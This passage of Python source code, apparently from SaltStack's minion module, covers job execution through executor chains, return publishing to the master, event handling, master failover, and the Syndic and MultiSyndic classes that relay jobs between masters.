        with salt.utils.fopen(fn_, 'w+b') as fp_:
            fp_.write(minion_instance.serial.dumps(sdata))
        ret = {'success': False}
        function_name = data['fun']
        if function_name in minion_instance.functions:
            try:
                func = minion_instance.functions[function_name]
                args, kwargs = load_args_and_kwargs(
                    func,
                    data['arg'],
                    data)
                minion_instance.functions.pack['__context__']['retcode'] = 0

                executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
                if isinstance(executors, six.string_types):
                    executors = [executors]
                elif not isinstance(executors, list) or not executors:
                    raise SaltInvocationError(
                        "Wrong executors specification: {0}. String or "
                        "non-empty list expected".format(executors)
                    )
                if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
                    if executors[-1] in FUNCTION_EXECUTORS:
                        executors[-1] = 'sudo.get'  # replace
                    else:
                        executors.append('sudo.get')  # append
                log.trace("Executors list {0}".format(executors))

                # Get executors
                def get_executor(name):
                    executor_class = minion_instance.executors.get(name)
                    if executor_class is None:
                        raise SaltInvocationError("Executor '{0}' is not available".format(name))
                    return executor_class
                # Get the last one that is function executor
                executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
                # Instantiate others from bottom to the top
                for executor_name in reversed(executors):
                    executor = get_executor(executor_name)(opts, data, executor)
                return_data = executor.execute()

                if isinstance(return_data, types.GeneratorType):
                    ind = 0
                    iret = {}
                    for single in return_data:
                        if isinstance(single, dict) and isinstance(iret, dict):
                            iret.update(single)
                        else:
                            if not iret:
                                iret = []
                            iret.append(single)
                        tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
                        event_data = {'return': single}
                        minion_instance._fire_master(event_data, tag)
                        ind += 1
                    ret['return'] = iret
                else:
                    ret['return'] = return_data
                ret['retcode'] = minion_instance.functions.pack['__context__'].get(
                    'retcode',
                    0
                )
                ret['success'] = True
            except CommandNotFoundError as exc:
                msg = 'Command required for \'{0}\' not found'.format(
                    function_name
                )
                log.debug(msg, exc_info=True)
                ret['return'] = '{0}: {1}'.format(msg, exc)
                ret['out'] = 'nested'
            except CommandExecutionError as exc:
                log.error(
                    'A command in \'{0}\' had a problem: {1}'.format(
                        function_name,
                        exc
                    ),
                    exc_info_on_loglevel=logging.DEBUG
                )
                ret['return'] = 'ERROR: {0}'.format(exc)
                ret['out'] = 'nested'
            except SaltInvocationError as exc:
                log.error(
                    'Problem executing \'{0}\': {1}'.format(
                        function_name,
                        exc
                    ),
                    exc_info_on_loglevel=logging.DEBUG
                )
                ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
                    function_name, exc
                )
                ret['out'] = 'nested'
            except TypeError as exc:
                msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
                    function_name, exc, func.__doc__
                )
                log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
                ret['return'] = msg
                ret['out'] = 'nested'
            except Exception:
                msg = 'The minion function caused an exception'
                log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
                salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
                ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
                ret['out'] = 'nested'
        else:
            ret['return'] = minion_instance.functions.missing_fun_string(function_name)
            mod_name = function_name.split('.')[0]
            if mod_name in minion_instance.function_errors:
                ret['return'] += ' Possible reasons: \'{0}\''.format(
                    minion_instance.function_errors[mod_name]
                )
            ret['success'] = False
            ret['retcode'] = 254
            ret['out'] = 'nested'

        ret['jid'] = data['jid']
        ret['fun'] = data['fun']
        ret['fun_args'] = data['arg']
        if 'master_id' in data:
            ret['master_id'] = data['master_id']
        if 'metadata' in data:
            if isinstance(data['metadata'], dict):
                ret['metadata'] = data['metadata']
            else:
                log.warning('The metadata parameter must be a dictionary. Ignoring.')
        minion_instance._return_pub(
            ret,
            timeout=minion_instance._return_retry_timer()
        )
        if data['ret']:
            if 'ret_config' in data:
                ret['ret_config'] = data['ret_config']
            ret['id'] = opts['id']
            for returner in set(data['ret'].split(',')):
                try:
                    minion_instance.returners['{0}.returner'.format(
                        returner
                    )](ret)
                except Exception as exc:
                    log.error(
                        'The return failed for job {0} {1}'.format(
                            data['jid'],
                            exc
                        )
                    )
                    log.error(traceback.format_exc())

    @classmethod
    def _thread_multi_return(cls, minion_instance, opts, data):
        '''
        This method should be used as a threading target, start the actual
        minion side execution.
        '''
        salt.utils.appendproctitle(data['jid'])
        # this seems awkward at first, but it's a workaround for Windows
        # multiprocessing communication.
        if not minion_instance:
            minion_instance = cls(opts)
        ret = {
            'return': {},
            'success': {},
        }
        for ind in range(0, len(data['fun'])):
            ret['success'][data['fun'][ind]] = False
            try:
                func = minion_instance.functions[data['fun'][ind]]
                args, kwargs = load_args_and_kwargs(
                    func,
                    data['arg'][ind],
                    data)
                ret['return'][data['fun'][ind]] = func(*args, **kwargs)
                ret['success'][data['fun'][ind]] = True
            except Exception as exc:
                trb = traceback.format_exc()
                log.warning(
                    'The minion function caused an exception: {0}'.format(
                        exc
                    )
                )
                ret['return'][data['fun'][ind]] = trb
        ret['jid'] = data['jid']
        ret['fun'] = data['fun']
        ret['fun_args'] = data['arg']
        if 'metadata' in data:
            ret['metadata'] = data['metadata']
        minion_instance._return_pub(
            ret,
            timeout=minion_instance._return_retry_timer()
        )
        if data['ret']:
            if 'ret_config' in data:
                ret['ret_config'] = data['ret_config']
            for returner in set(data['ret'].split(',')):
                ret['id'] = opts['id']
                try:
                    minion_instance.returners['{0}.returner'.format(
                        returner
                    )](ret)
                except Exception as exc:
                    log.error(
                        'The return failed for job {0} {1}'.format(
                            data['jid'],
                            exc
                        )
                    )

    def _return_pub(self, ret, ret_cmd='_return', timeout=60):
        '''
        Return the data from the executed command to the master server
        '''
        jid = ret.get('jid', ret.get('__jid__'))
        fun = ret.get('fun', ret.get('__fun__'))
        if self.opts['multiprocessing']:
            fn_ = os.path.join(self.proc_dir, jid)
            if os.path.isfile(fn_):
                try:
                    os.remove(fn_)
                except (OSError, IOError):
                    # The file is gone already
                    pass
        log.info('Returning information for job: {0}'.format(jid))
        channel = salt.transport.Channel.factory(self.opts)
        if ret_cmd == '_syndic_return':
            load = {'cmd': ret_cmd,
                    'id': self.opts['id'],
                    'jid': jid,
                    'fun': fun,
                    'arg': ret.get('arg'),
                    'tgt': ret.get('tgt'),
                    'tgt_type': ret.get('tgt_type'),
                    'load': ret.get('__load__')}
            if '__master_id__' in ret:
                load['master_id'] = ret['__master_id__']
            load['return'] = {}
            for key, value in six.iteritems(ret):
                if key.startswith('__'):
                    continue
                load['return'][key] = value
        else:
            load = {'cmd': ret_cmd,
                    'id': self.opts['id']}
            for key, value in six.iteritems(ret):
                load[key] = value

        if 'out' in ret:
            if isinstance(ret['out'], six.string_types):
                load['out'] = ret['out']
            else:
                log.error('Invalid outputter {0}. This is likely a bug.'
                          .format(ret['out']))
        else:
            try:
                oput = self.functions[fun].__outputter__
            except (KeyError, AttributeError, TypeError):
                pass
            else:
                if isinstance(oput, six.string_types):
                    load['out'] = oput
        if self.opts['cache_jobs']:
            # Local job cache has been enabled
            fn_ = os.path.join(
                self.opts['cachedir'],
                'minion_jobs',
                load['jid'],
                'return.p')
            jdir = os.path.dirname(fn_)
            if not os.path.isdir(jdir):
                os.makedirs(jdir)
            with salt.utils.fopen(fn_, 'w+b') as fp_:
                fp_.write(self.serial.dumps(ret))
        try:
            ret_val = channel.send(load, timeout=timeout)
        except SaltReqTimeoutError:
            msg = ('The minion failed to return the job information for job '
                   '{0}. This is often due to the master being shut down or '
                   'overloaded. If the master is running consider increasing '
                   'the worker_threads value.').format(jid)
            log.warning(msg)
            return ''
        log.trace('ret_val = {0}'.format(ret_val))
        return ret_val

    def _state_run(self):
        '''
        Execute a state run based on information set in the minion config file
        '''
        if self.opts['startup_states']:
            data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
            if self.opts['startup_states'] == 'sls':
                data['fun'] = 'state.sls'
                data['arg'] = [self.opts['sls_list']]
            elif self.opts['startup_states'] == 'top':
                data['fun'] = 'state.top'
                data['arg'] = [self.opts['top_file']]
            else:
                data['fun'] = 'state.highstate'
                data['arg'] = []
            self._handle_decoded_payload(data)

    def _refresh_grains_watcher(self, refresh_interval_in_minutes):
        '''
        Create a loop that will fire a pillar refresh to inform a master about
        a change in the grains of this minion

        :param refresh_interval_in_minutes:
        :return: None
        '''
        if '__update_grains' not in self.opts.get('schedule', {}):
            if 'schedule' not in self.opts:
                self.opts['schedule'] = {}
            self.opts['schedule'].update({
                '__update_grains':
                    {
                        'function': 'event.fire',
                        'args': [{}, 'grains_refresh'],
                        'minutes': refresh_interval_in_minutes
                    }
            })

    def _fire_master_minion_start(self):
        # Send an event to the master that the minion is live
        self._fire_master(
            'Minion {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            'minion_start'
        )
        # dup name spaced event
        self._fire_master(
            'Minion {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            tagify([self.opts['id'], 'start'], 'minion'),
        )

    def module_refresh(self, force_refresh=False, notify=False):
        '''
        Refresh the functions and returners.
        '''
        log.debug('Refreshing modules. Notify={0}'.format(notify))
        self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
        self.schedule.functions = self.functions
        self.schedule.returners = self.returners

    # TODO: only allow one future in flight at a time?
    @tornado.gen.coroutine
    def pillar_refresh(self, force_refresh=False):
        '''
        Refresh the pillar
        '''
        log.debug('Refreshing pillar')
        try:
            self.opts['pillar'] = yield salt.pillar.get_async_pillar(
                self.opts,
                self.opts['grains'],
                self.opts['id'],
                self.opts['environment'],
                pillarenv=self.opts.get('pillarenv'),
            ).compile_pillar()
        except SaltClientError:
            # Do not exit if a pillar refresh fails.
            log.error('Pillar data could not be refreshed. '
                      'One or more masters may be down!')
        self.module_refresh(force_refresh)

    def manage_schedule(self, package):
        '''
        Manage the minion's scheduler: add, modify, delete, enable or
        disable jobs based on the event data.
        '''
        tag, data = salt.utils.event.MinionEvent.unpack(package)
        func = data.get('func', None)
        name = data.get('name', None)
        schedule = data.get('schedule', None)
        where = data.get('where', None)
        persist = data.get('persist', None)

        if func == 'delete':
            self.schedule.delete_job(name, persist)
        elif func == 'add':
            self.schedule.add_job(schedule, persist)
        elif func == 'modify':
            self.schedule.modify_job(name, schedule, persist, where)
        elif func == 'enable':
            self.schedule.enable_schedule()
        elif func == 'disable':
            self.schedule.disable_schedule()
        elif func == 'enable_job':
            self.schedule.enable_job(name, persist, where)
        elif func == 'run_job':
            self.schedule.run_job(name)
        elif func == 'disable_job':
            self.schedule.disable_job(name, persist, where)
        elif func == 'reload':
            self.schedule.reload(schedule)
        elif func == 'list':
            self.schedule.list(where)
        elif func == 'save_schedule':
            self.schedule.save_schedule()

    def manage_beacons(self, package):
        '''
        Manage Beacons
        '''
        tag, data = salt.utils.event.MinionEvent.unpack(package)
        func = data.get('func', None)
        name = data.get('name', None)
        beacon_data = data.get('beacon_data', None)

        if func == 'add':
            self.beacons.add_beacon(name, beacon_data)
        elif func == 'modify':
            self.beacons.modify_beacon(name, beacon_data)
        elif func == 'delete':
            self.beacons.delete_beacon(name)
        elif func == 'enable':
            self.beacons.enable_beacons()
        elif func == 'disable':
            self.beacons.disable_beacons()
        elif func == 'enable_beacon':
            self.beacons.enable_beacon(name)
        elif func == 'disable_beacon':
            self.beacons.disable_beacon(name)
        elif func == 'list':
            self.beacons.list_beacons()

    def environ_setenv(self, package):
        '''
        Set the salt-minion main process environment according to
        the data contained in the minion event data
        '''
        tag, data = salt.utils.event.MinionEvent.unpack(package)
        environ = data.get('environ', None)
        if environ is None:
            return False
        false_unsets = data.get('false_unsets', False)
        clear_all = data.get('clear_all', False)
        import salt.modules.environ as mod_environ
        return mod_environ.setenv(environ, false_unsets, clear_all)

    def clean_die(self, signum, frame):
        '''
        Python does not handle SIGTERM cleanly; if it is signaled, exit
        the minion process cleanly
        '''
        self._running = False
        exit(0)

    def _pre_tune(self):
        '''
        Set the minion running flag and issue the appropriate warnings if
        the minion cannot be started or is already running
        '''
        if self._running is None:
            self._running = True
        elif self._running is False:
            log.error(
                'This {0} was scheduled to stop. Not running '
                '{0}.tune_in()'.format(self.__class__.__name__)
            )
            return
        elif self._running is True:
            log.error(
                'This {0} is already running. Not running '
                '{0}.tune_in()'.format(self.__class__.__name__)
            )
            return

        try:
            log.info(
                '{0} is starting as user \'{1}\''.format(
                    self.__class__.__name__,
                    salt.utils.get_user()
                )
            )
        except Exception as err:
            # Only windows is allowed to fail here. See #3189. Log as debug in
            # that case. Else, error.
            log.log(
                salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
                'Failed to get the user who is starting {0}'.format(
                    self.__class__.__name__
                ),
                exc_info=err
            )

    def _mine_send(self, package):
        '''
        Send mine data to the master
        '''
        channel = salt.transport.Channel.factory(self.opts)
        load = salt.utils.event.SaltEvent.unpack(package)[1]
        load['tok'] = self.tok
        try:
            ret = channel.send(load)
            return ret
        except SaltReqTimeoutError:
            log.warning('Unable to send mine data to master.')
            return None

    @tornado.gen.coroutine
    def handle_event(self, package):
        '''
        Handle an event from the epull_sock (all local minion events)
        '''
        log.debug('Handling event \'{0}\''.format(package))
        if package.startswith('module_refresh'):
            tag, data = salt.utils.event.MinionEvent.unpack(package)
            self.module_refresh(notify=data.get('notify', False))
        elif package.startswith('pillar_refresh'):
            yield self.pillar_refresh()
        elif package.startswith('manage_schedule'):
            self.manage_schedule(package)
        elif package.startswith('manage_beacons'):
            self.manage_beacons(package)
        elif package.startswith('grains_refresh'):
            if self.grains_cache != self.opts['grains']:
                self.pillar_refresh(force_refresh=True)
                self.grains_cache = self.opts['grains']
        elif package.startswith('environ_setenv'):
            self.environ_setenv(package)
        elif package.startswith('_minion_mine'):
            self._mine_send(package)
        elif package.startswith('fire_master'):
            tag, data = salt.utils.event.MinionEvent.unpack(package)
            log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
            self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
        elif package.startswith('__master_disconnected'):
            tag, data = salt.utils.event.MinionEvent.unpack(package)
            # if the master disconnect event is for a different master, raise an exception
            if data['master'] != self.opts['master']:
                raise Exception()
            if self.connected:
                # we are not connected anymore
                self.connected = False
                # modify the scheduled job to fire only on reconnect
                schedule = {
                    'function': 'status.master',
                    'seconds': self.opts['master_alive_interval'],
                    'jid_include': True,
                    'maxrunning': 2,
                    'kwargs': {'master': self.opts['master'],
                               'connected': False}
                }
                self.schedule.modify_job(name='__master_alive',
                                         schedule=schedule)

                log.info('Connection to master {0} lost'.format(self.opts['master']))

                if self.opts['master_type'] == 'failover':
                    log.info('Trying to tune in to next master from master-list')

                    # if eval_master finds a new master for us, self.connected
                    # will be True again on successful master authentication
                    self.opts['master'] = self.eval_master(opts=self.opts,
                                                           failed=True)
                    if self.connected:
                        # re-init the subsystems to work with the new master
                        log.info('Re-initialising subsystems for new '
                                 'master {0}'.format(self.opts['master']))
                        del self.pub_channel
                        self._connect_master_future = self.connect_master()
                        self.block_until_connected()  # TODO: remove
                        self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
                        self._fire_master_minion_start()
                        log.info('Minion is ready to receive requests!')

                        # update scheduled job to run with the new master addr
                        schedule = {
                            'function': 'status.master',
                            'seconds': self.opts['master_alive_interval'],
                            'jid_include': True,
                            'maxrunning': 2,
                            'kwargs': {'master': self.opts['master'],
                                       'connected': True}
                        }
                        self.schedule.modify_job(name='__master_alive',
                                                 schedule=schedule)
        elif package.startswith('__master_connected'):
            # handle this event only once. otherwise it will pollute the log
            if not self.connected:
                log.info('Connection to master {0} re-established'.format(self.opts['master']))
                self.connected = True
                # modify the __master_alive job to only fire,
                # if the connection is lost again
                schedule = {
                    'function': 'status.master',
                    'seconds': self.opts['master_alive_interval'],
                    'jid_include': True,
                    'maxrunning': 2,
                    'kwargs': {'master': self.opts['master'],
                               'connected': True}
                }
                self.schedule.modify_job(name='__master_alive',
                                         schedule=schedule)
        elif package.startswith('_salt_error'):
            tag, data = salt.utils.event.MinionEvent.unpack(package)
            log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
            self._fire_master(data, tag)

    def _fallback_cleanups(self):
        '''
        Fallback cleanup routines, attempting to fix leaked processes,
        threads, etc.
        '''
        # Add an extra fallback in case a forked process leaks through
        multiprocessing.active_children()

        # Cleanup Windows threads
        if not salt.utils.is_windows():
            return
        for thread in self.win_proc:
            if not thread.is_alive():
                thread.join()
                try:
                    self.win_proc.remove(thread)
                    del thread
                except (ValueError, NameError):
                    pass

    # Main Minion Tune In
    def tune_in(self, start=True):
        '''
        Lock onto the publisher. This is the main event loop for the minion

        :rtype : None
        '''
        self._pre_tune()

        # Properly exit if a SIGTERM is signalled
        signal.signal(signal.SIGTERM, self.clean_die)

        # start up the event publisher, so we can see events during startup
        self.event_publisher = salt.utils.event.AsyncEventPublisher(
            self.opts,
            self.handle_event,
            io_loop=self.io_loop,
        )

        log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))

        if start:
            self.sync_connect_master()
        self._fire_master_minion_start()
        log.info('Minion is ready to receive requests!')

        # Make sure to gracefully handle SIGUSR1
        enable_sigusr1_handler()

        # Make sure to gracefully handle CTRL_LOGOFF_EVENT
        salt.utils.enable_ctrl_logoff_handler()

        # On first startup execute a state run if configured to do so
        self._state_run()

        loop_interval = self.opts['loop_interval']

        try:
            if self.opts['grains_refresh_every']:  # If exists and is not zero. In minutes, not seconds!
                if self.opts['grains_refresh_every'] > 1:
                    log.debug(
                        'Enabling the grains refresher. Will run every {0} minutes.'.format(
                            self.opts['grains_refresh_every'])
                    )
                else:  # Clean up minute vs. minutes in log message
                    log.debug(
                        'Enabling the grains refresher. Will run every {0} minute.'.format(
                            self.opts['grains_refresh_every'])
                    )
                self._refresh_grains_watcher(
                    abs(self.opts['grains_refresh_every'])
                )
        except Exception as exc:
            log.error(
                'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
                    exc)
            )

        self.periodic_callbacks = {}
        # schedule the stuff that runs every interval
        ping_interval = self.opts.get('ping_interval', 0) * 60
        if ping_interval > 0:
            def ping_master():
                if not self._fire_master('ping', 'minion_ping'):
                    if not self.opts.get('auth_safemode', True):
                        log.error('** Master Ping failed. Attempting to restart minion**')
                        delay = self.opts.get('random_reauth_delay', 5)
                        log.info('delaying random_reauth_delay {0}s'.format(delay))
                        # regular sys.exit raises an exception -- which isn't sufficient in a thread
                        os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
            self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)

        self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)

        def handle_beacons():
            # Process Beacons
            try:
                beacons = self.process_beacons(self.functions)
            except Exception:
                log.critical('The beacon errored: ', exc_info=True)
                beacons = None
            if beacons:
                self._fire_master(events=beacons)
        self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)

        # TODO: actually listen to the return and change period
        def handle_schedule():
            self.process_schedule(self, loop_interval)
        self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)

        # start all the other callbacks
        for periodic_cb in six.itervalues(self.periodic_callbacks):
            periodic_cb.start()

        # add handler to subscriber
        self.pub_channel.on_recv(self._handle_payload)

        if start:
            self.io_loop.start()

    def _handle_payload(self, payload):
        if payload is not None and self._target_load(payload['load']):
            self._handle_decoded_payload(payload['load'])

    def _target_load(self, load):
        # Verify that the publication is valid
        if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
           or 'arg' not in load:
            return False
        # Verify that the publication applies to this minion

        # It's important to note that the master does some pre-processing
        # to determine which minions to send a request to. So for example,
        # a "salt -G 'grain_key:grain_val' test.ping" will invoke some
        # pre-processing on the master and this minion should not see the
        # publication if the master does not determine that it should.
        if 'tgt_type' in load:
            match_func = getattr(self.matcher,
                                 '{0}_match'.format(load['tgt_type']), None)
            if match_func is None:
                return False
            if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
                delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
                if not match_func(load['tgt'], delimiter=delimiter):
                    return False
            elif not match_func(load['tgt']):
                return False
        else:
            if not self.matcher.glob_match(load['tgt']):
                return False

        return True

    def destroy(self):
        '''
        Tear down the minion
        '''
        self._running = False
        if hasattr(self, 'pub_channel'):
            self.pub_channel.on_recv(None)
            del self.pub_channel
        if hasattr(self, 'periodic_callbacks'):
            for cb in six.itervalues(self.periodic_callbacks):
                cb.stop()

    def __del__(self):
        self.destroy()


class Syndic(Minion):
    '''
    Make a Syndic minion, this minion will use the minion keys on the
    master to authenticate with a higher level master.
    '''
    def __init__(self, opts, **kwargs):
        self._syndic_interface = opts.get('interface')
        self._syndic = True
        # force auth_safemode True because the Syndic doesn't support autorestart
        opts['auth_safemode'] = True
        opts['loop_interval'] = 1
        super(Syndic, self).__init__(opts, **kwargs)
        self.mminion = salt.minion.MasterMinion(opts)
        self.jid_forward_cache = set()

    def _handle_decoded_payload(self, data):
        '''
        Override this method if you wish to handle the decoded data
        differently.
        '''
        # TODO: even do this??
        data['to'] = int(data.get('to', self.opts['timeout'])) - 1
        # Only forward the command if it didn't originate from ourselves
        if data.get('master_id', 0) != self.opts.get('master_id', 1):
            self.syndic_cmd(data)

    def syndic_cmd(self, data):
        '''
        Take the now clear load and forward it on to the client cmd
        '''
        # Set up default tgt_type
        if 'tgt_type' not in data:
            data['tgt_type'] = 'glob'
        kwargs = {}

        # optionally add a few fields to the publish data
        for field in ('master_id',  # which master the job came from
                      'user',  # which user ran the job
                      ):
            if field in data:
                kwargs[field] = data[field]

        try:
            # Send out the publication
            self.local.pub(data['tgt'],
                           data['fun'],
                           data['arg'],
                           data['tgt_type'],
                           data['ret'],
                           data['jid'],
                           data['to'],
                           **kwargs)
        except Exception as exc:
            log.warning('Unable to forward pub data: {0}'.format(exc))

    def _fire_master_syndic_start(self):
        # Send an event to the master that the minion is live
        self._fire_master(
            'Syndic {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            'syndic_start'
        )
        self._fire_master(
            'Syndic {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            tagify([self.opts['id'], 'start'], 'syndic'),
        )

    # Syndic Tune In
    def tune_in(self, start=True):
        '''
        Lock onto the publisher. This is the main event loop for the syndic
        '''
        signal.signal(signal.SIGTERM, self.clean_die)
        log.debug('Syndic \'{0}\' trying to tune in'.format(self.opts['id']))

        if start:
            self.sync_connect_master()

        # Instantiate the local client
        self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
        self.local.event.subscribe('')
        self.local.opts['interface'] = self._syndic_interface

        # add handler to subscriber
        self.pub_channel.on_recv(self._process_cmd_socket)

        # register the event sub to the poller
        self._reset_event_aggregation()
        self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
        self.local_event_stream.on_recv(self._process_event)

        # forward events every syndic_event_forward_timeout
        self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
                                                              self.opts['syndic_event_forward_timeout'] * 1000,
                                                              io_loop=self.io_loop)
        self.forward_events.start()

        # Send an event to the master that the minion is live
        self._fire_master_syndic_start()

        # Make sure to gracefully handle SIGUSR1
        enable_sigusr1_handler()

        if start:
            self.io_loop.start()

    # TODO: clean up docs
    def tune_in_no_block(self):
        '''
        Executes the tune_in sequence but omits extra logging and the
        management of the event bus assuming that these are handled outside
        the tune_in sequence
        '''
        # Instantiate the local client
        self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])

        # add handler to subscriber
        self.pub_channel.on_recv(self._process_cmd_socket)

    def _process_cmd_socket(self, payload):
        if payload is not None:
            log.trace('Handling payload')
            self._handle_decoded_payload(payload['load'])

    def _reset_event_aggregation(self):
        self.jids = {}
        self.raw_events = []

    def _process_event(self, raw):
        # TODO: cleanup: Move down into event class
        raw = raw[0]
        mtag, data = self.local.event.unpack(raw, self.local.event.serial)
        event = {'data': data, 'tag': mtag}
        log.trace('Got event {0}'.format(event['tag']))
        tag_parts = event['tag'].split('/')
        if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
                salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
                'return' in event['data']:
            if 'jid' not in event['data']:
                # Not a job return
                return
            jdict = self.jids.setdefault(event['tag'], {})
            if not jdict:
                jdict['__fun__'] = event['data'].get('fun')
                jdict['__jid__'] = event['data']['jid']
                jdict['__load__'] = {}
                fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
                # Only need to forward each load once. Don't hit the disk
                # for every minion return!
                if event['data']['jid'] not in self.jid_forward_cache:
                    jdict['__load__'].update(
                        self.mminion.returners[fstr](event['data']['jid'])
                    )
                    self.jid_forward_cache.add(event['data']['jid'])
                    if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
                        # Pop the oldest jid from the cache
                        tmp = sorted(list(self.jid_forward_cache))
                        tmp.pop(0)
                        self.jid_forward_cache = set(tmp)
            if 'master_id' in event['data']:
                # __'s to make sure it doesn't print out on the master cli
                jdict['__master_id__'] = event['data']['master_id']
            jdict[event['data']['id']] = event['data']['return']
        else:
            # Add generic event aggregation here
            if 'retcode' not in event['data']:
                self.raw_events.append(event)

    def _forward_events(self):
        log.trace('Forwarding events')
        if self.raw_events:
            self._fire_master(events=self.raw_events,
                              pretag=tagify(self.opts['id'], base='syndic'),
                              )
        for jid in self.jids:
            self._return_pub(self.jids[jid],
                             '_syndic_return',
                             timeout=self._return_retry_timer())
        self._reset_event_aggregation()

    def destroy(self):
        '''
        Tear down the syndic minion
        '''
        # We borrowed the local clients poller so give it back before
        # it's destroyed. Reset the local poller reference.
        super(Syndic, self).destroy()
        if hasattr(self, 'local'):
            del self.local

        if hasattr(self, 'forward_events'):
            self.forward_events.stop()


# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
    '''
    Make a MultiSyndic minion, this minion will handle relaying jobs and
    returns from all minions connected to it to the list of masters it is
    connected to.

    Modes (controlled by ``syndic_mode``):
        sync: This mode will synchronize all events and publishes from
            higher level masters
        cluster: This mode will only sync job publishes and returns

    Note: jobs will be returned best-effort to the requesting master. This
    also means (since we are using zmq) that if a job was fired and the
    master disconnects between the publish and return, that the return
    will end up in a zmq buffer in this Syndic headed to that original
    master.

    In addition, since these classes all seem to use a mix of blocking and
    non-blocking calls (with varying timeouts along the way) this daemon
    does not handle failure well, it will (under most circumstances) stall
    the daemon for ~15s trying to forward events to the down master
    '''
    # time to connect to upstream master
    SYNDIC_CONNECT_TIMEOUT = 5
    SYNDIC_EVENT_TIMEOUT = 5

    def __init__(self, opts, io_loop=None):
        opts['loop_interval'] = 1
        super(MultiSyndic, self).__init__(opts)
        self.mminion = salt.minion.MasterMinion(opts)
        # sync (old behavior), cluster (only returns and publishes)
        self.syndic_mode = self.opts.get('syndic_mode', 'sync')

        self.auth_wait = self.opts['acceptance_wait_time']
        self.max_auth_wait = self.opts['acceptance_wait_time_max']

        self._has_master = threading.Event()
        self.jid_forward_cache = set()

        if io_loop is None:
            zmq.eventloop.ioloop.install()
            self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
        else:
            self.io_loop = io_loop

    def _spawn_syndics(self):
        '''
        Spawn all the coroutines which will sign in the syndics
        '''
        self._syndics = {}  # mapping of opts['master'] -> syndic
        for master in set(self.opts['master']):
            s_opts = copy.copy(self.opts)
            s_opts['master'] = master
            self._syndics[master] = self._connect_syndic(s_opts)

    @tornado.gen.coroutine
    def _connect_syndic(self, opts):
        '''
        Create a syndic, and asynchronously connect it to a master
        '''
        last = 0  # never have we signed in
        auth_wait = opts['acceptance_wait_time']
        while True:
            log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
            try:
                syndic = Syndic(opts,
                                timeout=self.SYNDIC_CONNECT_TIMEOUT,
                                safe=False,
                                io_loop=self.io_loop,
                                )
                yield syndic.connect_master()
                # set up the syndic to handle publishes (specifically not event forwarding)
                syndic.tune_in_no_block()
                log.info('Syndic successfully connected to {0}'.format(opts['master']))
                break
            except SaltClientError:
                log.error('Error while bringing up syndic for multi-syndic. '
                          'Is master at {0} responding?'.format(opts['master']))
                last = time.time()
                if auth_wait < self.max_auth_wait:
                    auth_wait += self.auth_wait
                yield tornado.gen.sleep(auth_wait)  # TODO: log?
            except KeyboardInterrupt:
                raise
            except:  # pylint: disable=W0702
                log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)

        raise tornado.gen.Return(syndic)

    def _mark_master_dead(self, master):
        '''
        Mark a master as dead. This will start the sign-in routine
        '''
        # if it's connected, mark it dead
        if self._syndics[master].done():
            syndic = self._syndics[master].result()
            syndic.destroy()
            self._syndics[master] = self._connect_syndic(syndic.opts)
        else:
            log.info('Attempting to mark {0} as dead, although it is already '
                     'marked dead'.format(master))  # TODO: debug?

    def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
        '''
        Wrapper to call a given func on a syndic, best effort to get the one
        you asked for
        '''
        if kwargs is None:
            kwargs = {}
        for master, syndic_future in self.iter_master_options(master_id):
            if not syndic_future.done() or syndic_future.exception():
                log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id))
                continue

            try:
                getattr(syndic_future.result(), func)(*args, **kwargs)
                return
            except SaltClientError:
                log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
                self._mark_master_dead(master)
                continue
        log.critical('Unable to call {0} on any masters!'.format(func))

    def iter_master_options(self, master_id=None):
        '''
        Iterate (in order) over your options for master
        '''
        masters = list(self._syndics.keys())
